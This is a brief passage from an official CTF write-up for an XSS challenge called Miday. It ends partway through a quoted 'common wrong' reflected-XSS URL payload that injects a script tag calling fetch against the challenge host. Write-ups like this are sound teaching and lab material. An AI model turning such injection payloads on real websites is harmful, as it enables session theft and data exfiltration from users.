NHNC CTF Official Write Up for Miday
Table Of Contents
* Miday
* Miday Revenge
* Miday Revenge Revenge
* Some final thoughts
Miday
Simple XSS
should be simple (?)
What made this challenge a little bit difficult is:
Encoding
+ -> " " (space)
Common Wrong Payload:
http://miday_ahdnsivs.nicewhite.eu.org:60007/search?search=a%22%3E%3Cscript%3Efetch(